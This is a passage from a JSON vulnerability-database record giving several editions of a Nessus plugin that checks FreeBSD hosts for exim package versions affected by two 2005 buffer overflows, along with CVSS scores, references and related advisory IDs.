value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:26:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ce6c77754f241a397e5d44de94decf8e2a0d0184b56b6b00eebebbf31607793d", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2017-10-29T13:43:47", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-10-29T13:43:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5f19553b2032ed74aeabcca84272374c4b5d1776ba2e1fc43dd83505187a514a", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-08-30T19:54:13", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:54:13"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "b09dad3a1a106eb7ecf8cc564c192cdc"}, {"key": "cvelist", "hash": "56682bdf77751f0db7701f0a4be98d1e"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "a2c4080bb75aa646d3d46cc3e994631a"}, {"key": "href", "hash": "c4c9410778877f2ff6b63b54f4a33cb5"}, {"key": "modified", "hash": "55b5f288c0c073cab7832e1f46b617e7"}, {"key": "naslFamily", "hash": "fe45aa727b58c1249bf04cfb7b4e6ae0"}, {"key": "pluginID", "hash": "cc34f605458c15226bb56a2d79f3d62c"}, {"key": "published", "hash": "9024ab754ee339f101e22cbcc0c75129"}, {"key": "references", "hash": "09cd0998f21b6811e8f5438ddcb628f2"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "767faad1c1a0bac1dea68a1424024c69"}, {"key": "title", "hash": "54fda255863604b985f16abe0a76639e"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "16815c800a3c847b124ff6cb5bc842e9837966a0b192fe482682aa2021e78082", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0022", "CVE-2005-0021"]}, {"type": "openvas", "idList": ["OPENVAS:54809", "OPENVAS:52252", "OPENVAS:53472", "OPENVAS:53474"]}, {"type": "freebsd", "idList": ["CA9CE879-5EBB-11D9-A01C-0050569F0001"]}, {"type": "nessus", "idList": ["FEDORA_2005-002.NASL", "FEDORA_2005-001.NASL", "REDHAT-RHSA-2005-025.NASL", "UBUNTU_USN-56-1.NASL", "EXIM_SPA_IPV6_OVERFLOW.NASL", "GENTOO_GLSA-200501-23.NASL", "DEBIAN_DSA-637.NASL", "DEBIAN_DSA-635.NASL"]}, {"type": "ubuntu", "idList": ["USN-56-1"]}, {"type": "gentoo", "idList": ["GLSA-200501-23"]}, {"type": "redhat", "idList": ["RHSA-2005:025"]}, {"type": "cert", "idList": ["VU:132992"]}, {"type": "debian", "idList": ["DEBIAN:DSA-637-1:4973F", "DEBIAN:DSA-635-1:15035"]}, {"type": "osvdb", "idList": ["OSVDB:12727", "OSVDB:12726", "OSVDB:12946"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7534", "SECURITYVULNS:DOC:7533"]}, {"type": "exploitdb", "idList": ["EDB-ID:756", "EDB-ID:1009"]}], "modified": "2019-02-21T01:08:40"}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-02-21T01:08:40"}, "vulnersScore": 7.9}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "19118", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "scheme": null}

